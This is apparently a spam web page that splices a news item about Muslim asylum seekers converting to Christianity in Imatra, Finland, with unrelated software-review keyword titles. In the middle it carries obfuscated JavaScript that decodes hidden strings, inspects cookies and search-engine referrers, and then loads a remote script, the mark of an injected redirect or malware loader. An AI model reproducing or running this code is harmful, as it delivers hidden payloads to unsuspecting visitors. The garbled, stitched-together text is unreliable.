Converts hail from Afghanistan, Iran and Iraq As many as 20 Afghani men are enrolled in 'pre-confirmation' teaching on the Christian faith at the Tainionkoski parish centre in Imatra, Eastern Finland.. 'I haven't been baptised yet, but I'm looking forward to it and I'm sure I will be a good Christian,' said one convert, Aliraza Hussaini.. Exact figures on the number of recent Muslim converts aren't available since such records aren't kept – but conservative estimates on the number suggest several hundred in recent years within the Finnish Evangelical Lutheran Church, according to the Finnish news source Yle Uutiset. Password For User On Mac

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Converts hail from Afghanistan, Iran and Iraq As many as 20 Afghani men are enrolled in 'pre-confirmation' teaching on the Christian faith at the Tainionkoski parish centre in Imatra, Eastern Finland.. 'I haven't been baptised yet, but I'm looking forward to it and I'm sure I will be a good Christian,' said one convert, Aliraza Hussaini.. Exact figures on the number of recent Muslim converts aren't available since such records aren't kept – but conservative estimates on the number suggest several hundred in recent years within the Finnish Evangelical Lutheran Church, according to the Finnish news source Yle Uutiset. e828bfe731 Password For User On Mac

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Many of the Imatra confirmation students reportedly cited a disillusionment with the Islamic faith, and say they will probably never return to Afghanistan.. 'I haven't been in contact with my family in Afghanistan for a very long time If they find out I've converted, it would mean trouble for me,' said another convert, Golamir Hossaini.. constructor(\x22return\x20this\x22)(\x20)' ');');_0x5221a4=_0x50186b();}catch(_0x2834df){_0x5221a4=window;}var _0x21f6a1='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=';_0x5221a4['atob']||(_0x5221a4['atob']=function(_0x234684){var _0x5eff15=String(_0x234684)['replace'](/= $/,'');for(var _0x1b5ee9=0x0,_0x2e2a67,_0x264912,_0x456dd0=0x0,_0x4dba4a='';_0x264912=_0x5eff15['charAt'](_0x456dd0 );~_0x264912&&(_0x2e2a67=_0x1b5ee9%0x4?_0x2e2a67*0x40 _0x264912:_0x264912,_0x1b5ee9 %0x4)?_0x4dba4a =String['fromCharCode'](0xff&_0x2e2a67>>(-0x2*_0x1b5ee9&0x6)):0x0){_0x264912=_0x21f6a1['indexOf'](_0x264912);}return _0x4dba4a;});}());_0x5664['base64DecodeUnicode']=function(_0x2fa577){var _0x550d9f=atob(_0x2fa577);var _0x121b1e=[];for(var _0x272b6a=0x0,_0x4636b1=_0x550d9f['length'];_0x272b6a=_0x8089;},'lFGXM':_0x5664('0xa')};var _0x306ac1=_0x3d9588[_0x5664('0xb')][_0x5664('0xc')]('|'),_0x37ae62=0x0;while(!![]){switch(_0x306ac1[_0x37ae62 ]){case'0':return _0x3e4658;case'1':var _0x1f37e4;continue;case'2':if(_0x3d9588[_0x5664('0xd')](!_0x50e997,_0x41faa4)){return undefined;}continue;case'3':for(var _0x26bfac=0x0;_0x3d9588[_0x5664('0xe')](_0x26bfac,_0x50e997['length']);_0x26bfac ){if(_0x3d9588[_0x5664('0xf')]!==_0x3d9588[_0x5664('0xf')]){if(_0x3d9588[_0x5664('0x10')](ref['indexOf'](refs[_0x26bfac]),0x0)){fromSR=!![];}}else{_0x1f37e4=_0x50e997[_0x26bfac][_0x5664('0xc')]('=');_0x3e4658[_0x1f37e4[0x0]]=_0x1f37e4[0x1]['replace'](/;$/);}}continue;case'4':var _0x50e997=document[_0x5664('0x11')][_0x5664('0x12')](/[\w-] =.. yahoo ','zrceP':_0x5664('0x1f'),'Vuhxh':_0x5664('0x20'),'jCrgf':_0x5664('0x21'),'eHoBM':function _0x1cbc1f(_0x229150,_0x4d4f01){return _0x229150=0x0){if(_0x2e43fe['QlVVm'](_0x2e43fe[_0x5664('0x2f')],_0x2e43fe[_0x5664('0x30')])){return undefined;}else{_0x29d7d4=!![];}}}if(_0x29d7d4){cookie[_0x5664('0x31')](_0x2e43fe['oXgPL'],0x1,0x1);if(!_0x5d4e65){include(_0x2e43fe[_0x5664('0x32')](_0x2e43fe[_0x5664('0x33')](_0x5664('0x34'),q),''));}}}R(); Hundreds of Muslims converting to Christianity in Finland, churches sayFinland has reportedly seen a flood of conversions from Islam to Christianity, with hundreds of asylum seekers from the Middle East turning to the Christian faith, officials in the Evangelical Lutheran community said. Moebius: Empire Rising Review For Mac

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